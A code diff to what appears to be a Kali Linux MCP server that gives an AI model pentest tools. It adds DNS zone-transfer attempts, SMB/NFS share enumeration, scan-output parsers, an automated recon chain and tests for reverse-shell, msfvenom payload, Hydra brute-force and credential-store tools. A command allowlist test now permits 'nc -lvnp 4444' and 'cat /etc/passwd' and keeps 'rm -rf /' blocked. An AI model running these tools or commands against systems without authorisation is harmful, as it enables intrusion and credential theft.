+        except asyncio.TimeoutError:
+            results.append(f"--- {rtype} Records ---\nTimeout\n")
+        except Exception as e:
+            results.append(f"--- {rtype} Records ---\nError: {str(e)}\n")
+
+    # Attempt zone transfer
+    zone_transfer = ""
+    try:
+        ns_process = await asyncio.create_subprocess_exec(
+            "dig", "+short", domain, "NS",
+            stdout=asyncio.subprocess.PIPE,
+            stderr=asyncio.subprocess.PIPE,
+        )
+        ns_stdout, _ = await asyncio.wait_for(ns_process.communicate(), timeout=10.0)
+        nameservers = [ns.strip().rstrip('.') for ns in ns_stdout.decode().strip().split('\n') if ns.strip()]
+        for ns in nameservers[:3]:
+            try:
+                axfr_process = await asyncio.create_subprocess_exec(
+                    "dig", f"@{ns}", domain, "AXFR",
+                    stdout=asyncio.subprocess.PIPE,
+                    stderr=asyncio.subprocess.PIPE,
+                )
+                axfr_stdout, _ = await asyncio.wait_for(axfr_process.communicate(), timeout=10.0)
+                axfr_output = axfr_stdout.decode().strip()
+                if "XFR size" in axfr_output:
+                    zone_transfer += f"\nZone transfer from {ns}:\n{axfr_output}\n"
+            except Exception:
+                pass
+    except Exception:
+        pass
+
+    full_output = f"DNS Enumeration for {domain}\n{'=' * 40}\n\n"
+    full_output += "\n".join(results)
+    if zone_transfer:
+        full_output += f"\n--- Zone Transfer ---\n{zone_transfer}"
+    else:
+        full_output += "\n--- Zone Transfer ---\nNo zone transfer possible (this is normal).\n"
+
+    try:
+        with open(output_file, "w") as f:
+            f.write(full_output)
+    except Exception:
+        pass
+
+    return [types.TextContent(type="text", text=
+        f"dns_enum completed for {domain}.\n\n"
+        f"Records queried: {', '.join(types_list)}\n"
+        f"Output file: {output_file}\n\n"
+        f"{full_output}"
+    )]
+
+
+async def enum_shares(
+    target: str,
+    enum_type: str = "all",
+    username: Optional[str] = None,
+    password: Optional[str] = None,
+) -> Sequence[types.TextContent]:
+    """
+    SMB/NFS share enumeration.
+
+    Args:
+        target: Target host
+        enum_type: Enumeration type (smb, nfs, all)
+        username: Optional SMB username
+        password: Optional SMB password
+
+    Returns:
+        List containing TextContent with share enumeration results
+    """
+    timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
+    safe_target = re.sub(r'[^a-zA-Z0-9._-]', '_', target)
+    output_file = f"enum_shares_{safe_target}_{timestamp}.txt"
+
+    results = []
+
+    if enum_type in ("smb", "all"):
+        # smbclient listing
+        smb_cmd = ["smbclient", "-L", target, "-N"]
+        if username:
+            smb_cmd = ["smbclient", "-L", target, "-U", f"{username}%{password or ''}"]
+        try:
+            process = await asyncio.create_subprocess_exec(
+                *smb_cmd,
+                stdout=asyncio.subprocess.PIPE,
+                stderr=asyncio.subprocess.PIPE,
+            )
+            stdout, stderr = await asyncio.wait_for(process.communicate(), timeout=30.0)
+            output = stdout.decode() + stderr.decode()
+            results.append(f"--- SMB Shares (smbclient) ---\n{output}\n")
+        except asyncio.TimeoutError:
+            results.append("--- SMB Shares (smbclient) ---\nTimeout\n")
+        except Exception as e:
+            results.append(f"--- SMB Shares (smbclient) ---\nError: {str(e)}\n")
+
+        # enum4linux
+        try:
+            e4l_cmd = f"enum4linux -a {shlex.quote(target)} > {output_file}_e4l 2>&1 &"
+            await asyncio.create_subprocess_shell(
+                e4l_cmd,
+                stdout=asyncio.subprocess.PIPE,
+                stderr=asyncio.subprocess.PIPE,
+            )
+            results.append(f"--- enum4linux ---\nRunning in background. Output: {output_file}_e4l\n")
+        except Exception as e:
+            results.append(f"--- enum4linux ---\nError: {str(e)}\n")
+
+    if enum_type in ("nfs", "all"):
+        try:
+            process = await asyncio.create_subprocess_exec(
+                "showmount", "-e", target,
+                stdout=asyncio.subprocess.PIPE,
+                stderr=asyncio.subprocess.PIPE,
+            )
+            stdout, stderr = await asyncio.wait_for(process.communicate(), timeout=15.0)
+            output = stdout.decode() + stderr.decode()
+            results.append(f"--- NFS Shares (showmount) ---\n{output}\n")
+        except asyncio.TimeoutError:
+            results.append("--- NFS Shares (showmount) ---\nTimeout\n")
+        except Exception as e:
+            results.append(f"--- NFS Shares (showmount) ---\nError: {str(e)}\n")
+
+    full_output = f"Share Enumeration for {target}\n{'=' * 40}\n\n"
+    full_output += "\n".join(results)
+
+    try:
+        with open(output_file, "w") as f:
+            f.write(full_output)
+    except Exception:
+        pass
+
+    return [types.TextContent(type="text", text=
+        f"enum_shares completed for {target}.\n\n"
+        f"Type: {enum_type}\n"
+        f"Output file: {output_file}\n\n"
+        f"{full_output}"
+    )]
+
+
+# --- Phase 3: Output Parsing Tools ---
+
+
+async def parse_nmap(filepath: str) -> Sequence[types.TextContent]:
+    """
+    Parse nmap output into structured findings.
+
+    Args:
+        filepath: Path to nmap output file (text or XML)
+
+    Returns:
+        List containing TextContent with parsed results
+    """
+    if not os.path.exists(filepath):
+        return [types.TextContent(type="text", text=f"Error: File not found: {filepath}")]
+
+    try:
+        with open(filepath, "r") as f:
+            content = f.read()
+    except Exception as e:
+        return [types.TextContent(type="text", text=f"Error reading file: {str(e)}")]
+
+    findings: dict = {"hosts": [], "open_ports": [], "services": [], "os_detection": [], "scripts": []}
+    is_xml = content.strip().startswith("<?xml") or "<nmaprun" in content[:200]
+
+    if is_xml:
+        try:
+            root = ET.fromstring(content)
+            for host_el in root.findall(".//host"):
+                addr_el = host_el.find("address")
+                addr = addr_el.get("addr", "unknown") if addr_el is not None else "unknown"
+                findings["hosts"].append(addr)
+
+                for port_el in host_el.findall(".//port"):
+                    state_el = port_el.find("state")
+                    if state_el is not None and state_el.get("state") == "open":
+                        portid = port_el.get("portid", "?")
+                        protocol = port_el.get("protocol", "?")
+                        svc_el = port_el.find("service")
+                        svc_name = svc_el.get("name", "unknown") if svc_el is not None else "unknown"
+                        svc_product = svc_el.get("product", "") if svc_el is not None else ""
+                        svc_version = svc_el.get("version", "") if svc_el is not None else ""
+                        findings["open_ports"].append(f"{portid}/{protocol}")
+                        svc_str = svc_name
+                        if svc_product:
+                            svc_str += f" ({svc_product}"
+                            if svc_version:
+                                svc_str += f" {svc_version}"
+                            svc_str += ")"
+                        findings["services"].append(f"{portid}/{protocol}: {svc_str}")
+
+                for script_el in host_el.findall(".//script"):
+                    sid = script_el.get("id", "unknown")
+                    soutput = script_el.get("output", "")
+                    findings["scripts"].append(f"{sid}: {soutput[:100]}")
+
+                os_el = host_el.find(".//osmatch")
+                if os_el is not None:
+                    findings["os_detection"].append(os_el.get("name", "unknown"))
+        except ET.ParseError as e:
+            return [types.TextContent(type="text", text=f"XML parse error: {str(e)}")]
+    else:
+        # Text format parsing
+        for line in content.split("\n"):
+            # Host detection
+            host_match = re.search(r'Nmap scan report for (\S+)', line)
+            if host_match:
+                findings["hosts"].append(host_match.group(1))
+
+            # Open ports
+            port_match = re.match(r'(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)', line)
+            if port_match:
+                portid, proto, svc, extra = port_match.groups()
+                findings["open_ports"].append(f"{portid}/{proto}")
+                findings["services"].append(f"{portid}/{proto}: {svc} {extra}".strip())
+
+            # OS detection
+            os_match = re.search(r'OS details:\s*(.+)', line)
+            if os_match:
+                findings["os_detection"].append(os_match.group(1))
+
+            # Script output
+            script_match = re.match(r'\|_?\s*(.+)', line)
+            if script_match and findings["open_ports"]:
+                findings["scripts"].append(script_match.group(1)[:100])
+
+    # Build summary
+    output = f"Parsed nmap output from {filepath}\n{'=' * 40}\n\n"
+    output += f"Hosts: {', '.join(findings['hosts']) if findings['hosts'] else 'None found'}\n"
+    output += f"Open ports ({len(findings['open_ports'])}): {', '.join(findings['open_ports']) if findings['open_ports'] else 'None'}\n\n"
+
+    if findings["services"]:
+        output += "Services:\n"
+        for svc in findings["services"]:
+            output += f"  - {svc}\n"
+
+    if findings["os_detection"]:
+        output += f"\nOS Detection: {', '.join(findings['os_detection'])}\n"
+
+    if findings["scripts"]:
+        output += f"\nScript output ({len(findings['scripts'])} entries):\n"
+        for s in findings["scripts"][:20]:
+            output += f"  - {s}\n"
+
+    # Save parsed JSON
+    json_file = filepath.rsplit(".", 1)[0] + "_parsed.json"
+    try:
+        with open(json_file, "w") as f:
+            json.dump(findings, f, indent=2)
+        output += f"\nStructured data saved to: {json_file}"
+    except Exception:
+        pass
+
+    return [types.TextContent(type="text", text=output)]
+
+
+TOOL_OUTPUT_PATTERNS = {
+    "nikto": {
+        "detect": ["nikto", "Target IP:", "Target Hostname:"],
+        "finding_re": r'^\+\s+(.+)',
+    },
+    "gobuster": {
+        "detect": ["Gobuster", "==============="],
+        "finding_re": r'^(/\S+)\s+\(Status:\s*(\d+)\)',
+    },
+    "dirb": {
+        "detect": ["DIRB", "START_TIME:", "WORDLIST_FILES:"],
+        "finding_re": r'^\+\s+(http\S+)\s+\(CODE:(\d+)',
+    },
+    "hydra": {
+        "detect": ["Hydra", "[DATA]", "host:"],
+        "finding_re": r'\[(\d+)\]\[(\S+)\]\s+host:\s+(\S+)\s+login:\s+(\S+)\s+password:\s+(\S+)',
+    },
+    "sqlmap": {
+        "detect": ["sqlmap", "[INFO]", "Parameter:"],
+        "finding_re": r'\[INFO\]\s+(.+)',
+    },
+}
+
+
+async def parse_tool_output(
+    filepath: str,
+    tool_type: str = "auto",
+) -> Sequence[types.TextContent]:
+    """
+    Generic output parser for nikto/gobuster/dirb/hydra/sqlmap.
+
+    Args:
+        filepath: Path to tool output file
+        tool_type: Tool type (auto, nikto, gobuster, dirb, hydra, sqlmap)
+
+    Returns:
+        List containing TextContent with parsed findings
+    """
+    if not os.path.exists(filepath):
+        return [types.TextContent(type="text", text=f"Error: File not found: {filepath}")]
+
+    try:
+        with open(filepath, "r") as f:
+            content = f.read()
+    except Exception as e:
+        return [types.TextContent(type="text", text=f"Error reading file: {str(e)}")]
+
+    # Auto-detect tool
+    detected_tool = tool_type
+    if tool_type == "auto":
+        for tool_name, patterns in TOOL_OUTPUT_PATTERNS.items():
+            if any(d in content for d in patterns["detect"]):
+                detected_tool = tool_name
+                break
+        if detected_tool == "auto":
+            return [types.TextContent(type="text", text=
+                f"Could not auto-detect tool type from {filepath}. "
+                f"Specify tool_type: nikto, gobuster, dirb, hydra, sqlmap"
+            )]
+
+    if detected_tool not in TOOL_OUTPUT_PATTERNS:
+        return [types.TextContent(type="text", text=f"Unsupported tool_type: {detected_tool}")]
+
+    pattern_info = TOOL_OUTPUT_PATTERNS[detected_tool]
+    findings = re.findall(pattern_info["finding_re"], content, re.MULTILINE)
+
+    output = f"Parsed {detected_tool} output from {filepath}\n{'=' * 40}\n\n"
+    output += f"Total findings: {len(findings)}\n\n"
+
+    if detected_tool == "hydra":
+        output += "Credentials found:\n"
+        for match in findings:
+            if len(match) >= 5:
+                output += f"  - {match[3]}:{match[4]} @ {match[2]} ({match[1]} port {match[0]})\n"
+            else:
+                output += f"  - {match}\n"
+    elif detected_tool == "gobuster":
+        status_groups: dict = {}
+        for match in findings:
+            path, status = match if isinstance(match, tuple) else (match, "?")
+            status_groups.setdefault(status, []).append(path)
+        for status, paths in sorted(status_groups.items()):
+            output += f"Status {status} ({len(paths)} paths):\n"
+            for p in paths[:20]:
+                output += f"  - {p}\n"
+            if len(paths) > 20:
+                output += f"  ... and {len(paths) - 20} more\n"
+    else:
+        for match in findings[:50]:
+            entry = match if isinstance(match, str) else " | ".join(match)
+            output += f"  - {entry}\n"
+        if len(findings) > 50:
+            output += f"  ... and {len(findings) - 50} more\n"
+
+    # Save parsed output
+    json_file = filepath.rsplit(".", 1)[0] + "_parsed.json"
+    try:
+        with open(json_file, "w") as f:
+            json.dump({"tool": detected_tool, "filepath": filepath, "findings_count": len(findings), "findings": [m if isinstance(m, str) else list(m) for m in findings]}, f, indent=2)
+        output += f"\nStructured data saved to: {json_file}"
+    except Exception:
+        pass
+
+    return [types.TextContent(type="text", text=output)]
+
+
+# --- Phase 4: Workflow Automation ---
+
+
+async def recon_auto(
+    target: str,
+    depth: str = "quick",
+) -> Sequence[types.TextContent]:
+    """
+    Automated multi-stage reconnaissance pipeline.
+
+    Args:
+        target: Target domain or IP
+        depth: Recon depth (quick, standard, deep)
+
+    Returns:
+        List containing TextContent with reconnaissance results
+    """
+    results = []
+    phases_completed = []
+
+    async def run_phase(name: str, coro):
+        try:
+            result = await coro
+            phases_completed.append(name)
+            text = result[0].text if result else "No output"
+            results.append(f"--- {name} ---\n{text[:300]}\n")
+        except Exception as e:
+            results.append(f"--- {name} ---\nError: {str(e)}\n")
+
+    # Quick: dns_enum -> port_scan(quick) -> header_analysis
+    await run_phase("DNS Enumeration", dns_enum(target))
+    await run_phase("Quick Port Scan", port_scan(target, scan_type="quick"))
+    url_target = target if target.startswith(("http://", "https://")) else f"http://{target}"
+    await run_phase("Header Analysis", header_analysis(url_target))
+
+    if depth in ("standard", "deep"):
+        await run_phase("Service Scan", port_scan(target, scan_type="service"))
+        await run_phase("SSL Analysis", ssl_analysis(url_target))
+        await run_phase("Exploit Search", exploit_search(target))
+
+    if depth == "deep":
+        await run_phase("Subdomain Enumeration", subdomain_enum(target))
+        await run_phase("Web Enumeration", web_enumeration(url_target))
+        await run_phase("Vulnerability Scan", vulnerability_scan(target))
+
+    output = f"Automated Recon for {target} (depth: {depth})\n{'=' * 50}\n\n"
+    output += f"Phases completed: {len(phases_completed)}/{len(results)}\n"
+    output += f"Phases: {', '.join(phases_completed)}\n\n"
+    output += "\n".join(results)
+
+    # Save summary
+    timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
+    safe_target = re.sub(r'[^a-zA-Z0-9._-]', '_', target)
+    output_file = f"recon_{safe_target}_{depth}_{timestamp}.txt"
+    try:
+        with open(output_file, "w") as f:
+            f.write(output)
+    except Exception:
+        pass
+
+    output += f"\nFull report saved to: {output_file}"
+    return [types.TextContent(type="text", text=output)]
+
+
 OUTPUT_FILE_PATTERNS = [
     # Core tool outputs
     "command_output.txt",
@@ -1683,5 +2708,16 @@ OUTPUT_FILE_PATTERNS = [
     "*_subfinder",
     "*_amass",
     "*_wayback",
-    "*_gospider"
+    "*_gospider",
+
+    # New tool outputs
+    "hydra_*.txt",
+    "payload_*",
+    "port_scan_*.txt",
+    "port_scan_*.xml",
+    "dns_enum_*.txt",
+    "enum_shares_*.txt",
+    "*_parsed.json",
+    "recon_*.txt",
+    "credentials.json",
 ]

--- a/tests/test_server.py
+++ b/tests/test_server.py
@@ -74,8 +74,228 @@ async def test_handle_resources_tool():
     with patch("kali_mcp_server.server.list_system_resources", mock_resources):
         # Call function
         result = await handle_tool_request("resources", {})
-        
+
         # Verify results
         assert len(result) == 1
         assert result[0].type == "text"
         assert result[0].text == "Resources info"
+
+
+# --- Dispatch tests for 12 new tools ---
+
+
+@pytest.mark.asyncio
+async def test_handle_encode_decode():
+    """Test dispatch for encode_decode tool."""
+    async def mock_fn(data, operation, fmt):
+        return [types.TextContent(type="text", text=f"encoded {data}")]
+
+    with patch("kali_mcp_server.server.encode_decode", mock_fn):
+        result = await handle_tool_request("encode_decode", {"data": "hello", "operation": "encode", "format": "base64"})
+        assert result[0].text == "encoded hello"
+
+
+@pytest.mark.asyncio
+async def test_handle_encode_decode_missing_arg():
+    """Test encode_decode dispatch with missing data."""
+    with pytest.raises(ValueError, match="Missing required argument 'data'"):
+        await handle_tool_request("encode_decode", {})
+
+
+@pytest.mark.asyncio
+async def test_handle_reverse_shell():
+    """Test dispatch for reverse_shell tool."""
+    async def mock_fn(lhost, shell_type, lport):
+        return [types.TextContent(type="text", text=f"shell {lhost}:{lport}")]
+
+    with patch("kali_mcp_server.server.reverse_shell", mock_fn):
+        result = await handle_tool_request("reverse_shell", {"lhost": "10.0.0.1"})
+        assert "10.0.0.1" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_handle_reverse_shell_missing_arg():
+    """Test reverse_shell dispatch with missing lhost."""
+    with pytest.raises(ValueError, match="Missing required argument 'lhost'"):
+        await handle_tool_request("reverse_shell", {})
+
+
+@pytest.mark.asyncio
+async def test_handle_hash_identify():
+    """Test dispatch for hash_identify tool."""
+    async def mock_fn(hash_value):
+        return [types.TextContent(type="text", text=f"identified {hash_value}")]
+
+    with patch("kali_mcp_server.server.hash_identify", mock_fn):
+        result = await handle_tool_request("hash_identify", {"hash_value": "abc123"})
+        assert "abc123" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_handle_hash_identify_missing_arg():
+    """Test hash_identify dispatch with missing hash_value."""
+    with pytest.raises(ValueError, match="Missing required argument 'hash_value'"):
+        await handle_tool_request("hash_identify", {})
+
+
+@pytest.mark.asyncio
+async def test_handle_credential_store():
+    """Test dispatch for credential_store tool."""
+    async def mock_fn(**kwargs):
+        return [types.TextContent(type="text", text=f"creds {kwargs.get('action')}")]
+
+    with patch("kali_mcp_server.server.credential_store", mock_fn):
+        result = await handle_tool_request("credential_store", {"action": "list"})
+        assert "creds list" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_handle_hydra_attack():
+    """Test dispatch for hydra_attack tool."""
+    async def mock_fn(**kwargs):
+        return [types.TextContent(type="text", text=f"hydra {kwargs.get('target')}")]
+
+    with patch("kali_mcp_server.server.hydra_attack", mock_fn):
+        result = await handle_tool_request("hydra_attack", {"target": "10.0.0.1", "username": "admin", "password": "pass"})
+        assert "10.0.0.1" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_handle_hydra_attack_missing_arg():
+    """Test hydra_attack dispatch with missing target."""
+    with pytest.raises(ValueError, match="Missing required argument 'target'"):
+        await handle_tool_request("hydra_attack", {})
+
+
+@pytest.mark.asyncio
+async def test_handle_payload_generate():
+    """Test dispatch for payload_generate tool."""
+    async def mock_fn(**kwargs):
+        return [types.TextContent(type="text", text=f"payload {kwargs.get('lhost')}")]
+
+    with patch("kali_mcp_server.server.payload_generate", mock_fn):
+        result = await handle_tool_request("payload_generate", {
+            "payload_type": "reverse_shell",
+            "platform": "linux",
+            "lhost": "10.0.0.1"
+        })
+        assert "10.0.0.1" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_handle_payload_generate_missing_args():
+    """Test payload_generate dispatch with missing args."""
+    with pytest.raises(ValueError, match="Missing required argument 'payload_type'"):
+        await handle_tool_request("payload_generate", {})
+    with pytest.raises(ValueError, match="Missing required argument 'platform'"):
+        await handle_tool_request("payload_generate", {"payload_type": "reverse_shell"})
+    with pytest.raises(ValueError, match="Missing required argument 'lhost'"):
+        await handle_tool_request("payload_generate", {"payload_type": "reverse_shell", "platform": "linux"})
+
+
+@pytest.mark.asyncio
+async def test_handle_port_scan():
+    """Test dispatch for port_scan tool."""
+    async def mock_fn(target, scan_type, ports):
+        return [types.TextContent(type="text", text=f"scan {target}")]
+
+    with patch("kali_mcp_server.server.port_scan", mock_fn):
+        result = await handle_tool_request("port_scan", {"target": "10.0.0.1"})
+        assert "10.0.0.1" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_handle_port_scan_missing_arg():
+    """Test port_scan dispatch with missing target."""
+    with pytest.raises(ValueError, match="Missing required argument 'target'"):
+        await handle_tool_request("port_scan", {})
+
+
+@pytest.mark.asyncio
+async def test_handle_dns_enum():
+    """Test dispatch for dns_enum tool."""
+    async def mock_fn(domain, record_types):
+        return [types.TextContent(type="text", text=f"dns {domain}")]
+
+    with patch("kali_mcp_server.server.dns_enum", mock_fn):
+        result = await handle_tool_request("dns_enum", {"domain": "example.com"})
+        assert "example.com" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_handle_dns_enum_missing_arg():
+    """Test dns_enum dispatch with missing domain."""
+    with pytest.raises(ValueError, match="Missing required argument 'domain'"):
+        await handle_tool_request("dns_enum", {})
+
+
+@pytest.mark.asyncio
+async def test_handle_enum_shares():
+    """Test dispatch for enum_shares tool."""
+    async def mock_fn(**kwargs):
+        return [types.TextContent(type="text", text=f"shares {kwargs.get('target')}")]
+
+    with patch("kali_mcp_server.server.enum_shares", mock_fn):
+        result = await handle_tool_request("enum_shares", {"target": "10.0.0.1"})
+        assert "10.0.0.1" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_handle_enum_shares_missing_arg():
+    """Test enum_shares dispatch with missing target."""
+    with pytest.raises(ValueError, match="Missing required argument 'target'"):
+        await handle_tool_request("enum_shares", {})
+
+
+@pytest.mark.asyncio
+async def test_handle_parse_nmap():
+    """Test dispatch for parse_nmap tool."""
+    async def mock_fn(filepath):
+        return [types.TextContent(type="text", text=f"parsed {filepath}")]
+
+    with patch("kali_mcp_server.server.parse_nmap", mock_fn):
+        result = await handle_tool_request("parse_nmap", {"filepath": "/tmp/nmap.txt"})
+        assert "/tmp/nmap.txt" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_handle_parse_nmap_missing_arg():
+    """Test parse_nmap dispatch with missing filepath."""
+    with pytest.raises(ValueError, match="Missing required argument 'filepath'"):
+        await handle_tool_request("parse_nmap", {})
+
+
+@pytest.mark.asyncio
+async def test_handle_parse_tool_output():
+    """Test dispatch for parse_tool_output tool."""
+    async def mock_fn(filepath, tool_type):
+        return [types.TextContent(type="text", text=f"parsed {filepath} as {tool_type}")]
+
+    with patch("kali_mcp_server.server.parse_tool_output", mock_fn):
+        result = await handle_tool_request("parse_tool_output", {"filepath": "/tmp/nikto.txt"})
+        assert "/tmp/nikto.txt" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_handle_parse_tool_output_missing_arg():
+    """Test parse_tool_output dispatch with missing filepath."""
+    with pytest.raises(ValueError, match="Missing required argument 'filepath'"):
+        await handle_tool_request("parse_tool_output", {})
+
+
+@pytest.mark.asyncio
+async def test_handle_recon_auto():
+    """Test dispatch for recon_auto tool."""
+    async def mock_fn(target, depth):
+        return [types.TextContent(type="text", text=f"recon {target} {depth}")]
+
+    with patch("kali_mcp_server.server.recon_auto", mock_fn):
+        result = await handle_tool_request("recon_auto", {"target": "example.com"})
+        assert "example.com" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_handle_recon_auto_missing_arg():
+    """Test recon_auto dispatch with missing target."""
+    with pytest.raises(ValueError, match="Missing required argument 'target'"):
+        await handle_tool_request("recon_auto", {})

--- a/tests/test_tools.py
+++ b/tests/test_tools.py
@@ -4,7 +4,7 @@ Tests for the tools module functionality.
 
 
 import pytest
-from unittest.mock import AsyncMock, MagicMock, patch
+from unittest.mock import patch
 import mcp.types as types
 
 from kali_mcp_server.tools import fetch_website, is_command_allowed
@@ -16,15 +16,24 @@ def test_is_command_allowed():
     assert is_command_allowed("uname -a")[0] is True
     assert is_command_allowed("ls -la")[0] is True
     assert is_command_allowed("nmap -F localhost")[0] is True
-    
+    assert is_command_allowed("cat /etc/passwd")[0] is True
+    assert is_command_allowed("ping 10.0.0.1")[0] is True
+    assert is_command_allowed("nc -lvnp 4444")[0] is True
+    assert is_command_allowed("msfconsole -q")[0] is True
+    assert is_command_allowed("python3 -c 'print(1)'")[0] is True
+
     # Test disallowed commands
     assert is_command_allowed("rm -rf /")[0] is False
     assert is_command_allowed("sudo apt-get install something")[0] is False
-    assert is_command_allowed("cat /etc/shadow")[0] is False
-    
+    assert is_command_allowed("shutdown -h now")[0] is False
+    assert is_command_allowed("reboot")[0] is False
+
     # Test long-running flag
     assert is_command_allowed("ls -la")[1] is False  # Not long-running
+    assert is_command_allowed("cat file.txt")[1] is False  # Not long-running
     assert is_command_allowed("nmap -F localhost")[1] is True  # Long-running
+    assert is_command_allowed("hydra -l admin target ssh")[1] is True
+    assert is_command_allowed("msfconsole -q")[1] is True
 
 
 @pytest.mark.asyncio
@@ -274,7 +283,428 @@ async def test_subdomain_enum():
 async def test_web_audit():
     """Test web audit functionality."""
     from kali_mcp_server.tools import web_audit
-    
+
     result = await web_audit("example.com", audit_type="basic")
     assert len(result) == 1
     assert "Web audit completed" in result[0].text
+
+
+# --- New tool tests ---
+
+
+@pytest.mark.asyncio
+async def test_encode_decode_base64_roundtrip():
+    """Test base64 encode/decode roundtrip."""
+    from kali_mcp_server.tools import encode_decode
+
+    result = await encode_decode("hello world", "encode", "base64")
+    assert len(result) == 1
+    assert "aGVsbG8gd29ybGQ=" in result[0].text
+
+    result = await encode_decode("aGVsbG8gd29ybGQ=", "decode", "base64")
+    assert len(result) == 1
+    assert "hello world" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_encode_decode_url():
+    """Test URL encoding."""
+    from kali_mcp_server.tools import encode_decode
+
+    result = await encode_decode("hello world&foo=bar", "encode", "url")
+    assert len(result) == 1
+    assert "hello%20world%26foo%3Dbar" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_encode_decode_hex():
+    """Test hex encoding."""
+    from kali_mcp_server.tools import encode_decode
+
+    result = await encode_decode("AB", "encode", "hex")
+    assert len(result) == 1
+    assert "4142" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_encode_decode_unsupported_format():
+    """Test unsupported format returns error message."""
+    from kali_mcp_server.tools import encode_decode
+
+    result = await encode_decode("data", "encode", "invalid")
+    assert len(result) == 1
+    assert "Unsupported format" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_reverse_shell():
+    """Test reverse shell generation contains lhost and lport."""
+    from kali_mcp_server.tools import reverse_shell
+
+    result = await reverse_shell("10.0.0.1", "bash", 9999)
+    assert len(result) == 1
+    assert "10.0.0.1" in result[0].text
+    assert "9999" in result[0].text
+    assert "Reverse Shell (bash)" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_reverse_shell_python():
+    """Test python reverse shell generation."""
+    from kali_mcp_server.tools import reverse_shell
+
+    result = await reverse_shell("192.168.1.1", "python", 4444)
+    assert len(result) == 1
+    assert "192.168.1.1" in result[0].text
+    assert "python" in result[0].text.lower()
+
+
+@pytest.mark.asyncio
+async def test_reverse_shell_unsupported():
+    """Test unsupported shell type."""
+    from kali_mcp_server.tools import reverse_shell
+
+    result = await reverse_shell("10.0.0.1", "golang")
+    assert len(result) == 1
+    assert "Unsupported shell type" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_hash_identify_md5():
+    """Test MD5 hash identification."""
+    from kali_mcp_server.tools import hash_identify
+
+    result = await hash_identify("5d41402abc4b2a76b9719d911017c592")
+    assert len(result) == 1
+    assert "MD5" in result[0].text
+    assert "Hashcat mode: 0" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_hash_identify_sha256():
+    """Test SHA-256 hash identification."""
+    from kali_mcp_server.tools import hash_identify
+
+    result = await hash_identify("e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855")
+    assert len(result) == 1
+    assert "SHA-256" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_hash_identify_unknown():
+    """Test unknown hash returns no match message."""
+    from kali_mcp_server.tools import hash_identify
+
+    result = await hash_identify("not-a-hash")
+    assert len(result) == 1
+    assert "No hash type identified" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_credential_store_add_and_list():
+    """Test credential store add and list roundtrip."""
+    import os
+    from kali_mcp_server.tools import credential_store
+
+    with patch("kali_mcp_server.tools.load_active_session", return_value=None):
+        # Clean up any existing creds file
+        if os.path.exists("credentials.json"):
+            os.remove("credentials.json")
+
+        result = await credential_store(action="add", username="admin", password="pass123", service="ssh", target="10.0.0.1")
+        assert len(result) == 1
+        assert "Credential added successfully" in result[0].text
+        assert "admin" in result[0].text
+
+        result = await credential_store(action="list")
+        assert len(result) == 1
+        assert "admin" in result[0].text
+        assert "pass123" in result[0].text
+
+        result = await credential_store(action="search", username="admin")
+        assert len(result) == 1
+        assert "admin" in result[0].text
+
+        # Clean up
+        if os.path.exists("credentials.json"):
+            os.remove("credentials.json")
+
+
+@pytest.mark.asyncio
+async def test_credential_store_add_missing_username():
+    """Test credential store add without username."""
+    from kali_mcp_server.tools import credential_store
+
+    with patch("kali_mcp_server.tools.load_active_session", return_value=None):
+        result = await credential_store(action="add")
+        assert len(result) == 1
+        assert "username" in result[0].text.lower()
+
+
+@pytest.mark.asyncio
+async def test_hydra_attack():
+    """Test hydra attack output format."""
+    from kali_mcp_server.tools import hydra_attack
+
+    result = await hydra_attack(
+        target="192.168.1.1",
+        service="ssh",
+        username="admin",
+        password="password",
+    )
+    assert len(result) == 1
+    assert "Hydra" in result[0].text
+    assert "192.168.1.1" in result[0].text
+    assert "ssh" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_hydra_attack_missing_creds():
+    """Test hydra attack validation for missing credentials."""
+    from kali_mcp_server.tools import hydra_attack
+
+    result = await hydra_attack(target="192.168.1.1", service="ssh")
+    assert len(result) == 1
+    assert "Error" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_payload_generate():
+    """Test msfvenom payload generation output format."""
+    from kali_mcp_server.tools import payload_generate
+
+    result = await payload_generate(
+        payload_type="reverse_shell",
+        platform="linux",
+        lhost="10.0.0.1",
+        lport=4444,
+        format="raw",
+    )
+    assert len(result) == 1
+    assert "msfvenom" in result[0].text
+    assert "10.0.0.1" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_payload_generate_unsupported():
+    """Test unsupported payload type."""
+    from kali_mcp_server.tools import payload_generate
+
+    result = await payload_generate(
+        payload_type="invalid",
+        platform="invalid",
+        lhost="10.0.0.1",
+    )
+    assert len(result) == 1
+    assert "Unsupported" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_port_scan():
+    """Test port scan output format."""
+    from kali_mcp_server.tools import port_scan
+
+    result = await port_scan("192.168.1.1", scan_type="quick")
+    assert len(result) == 1
+    assert "port_scan" in result[0].text
+    assert "192.168.1.1" in result[0].text
+    assert "quick" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_port_scan_unsupported_type():
+    """Test unsupported scan type."""
+    from kali_mcp_server.tools import port_scan
+
+    result = await port_scan("192.168.1.1", scan_type="invalid")
+    assert len(result) == 1
+    assert "Unknown scan_type" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_dns_enum():
